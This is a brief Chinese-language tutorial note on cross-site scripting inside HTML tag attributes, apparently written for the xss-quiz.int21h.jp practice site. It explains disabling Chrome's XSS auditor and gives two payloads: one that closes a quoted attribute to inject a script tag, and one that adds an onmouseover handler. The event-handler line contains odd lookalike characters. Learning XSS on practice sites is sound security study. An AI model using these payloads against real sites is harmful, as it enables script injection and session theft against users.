标签属性中的XSS
1. 配置Chrome关闭XSS-Auditor
https://xss-quiz.int21h.jp/ 利用XSS过程中会出现下图情况。配置Chrome --args --disable-xss-auditor


2. 属性中的XSS发现
技巧:ctrl+F 搜索特定字符串

3. 属性中的XSS闭合引入script
闭合引号 尖括号,引入script脚本
“><script>alert(document.domain);</script>

4. 属性中的XSS闭合引入事件
" οnmοuseοver=alert(document.domain)>
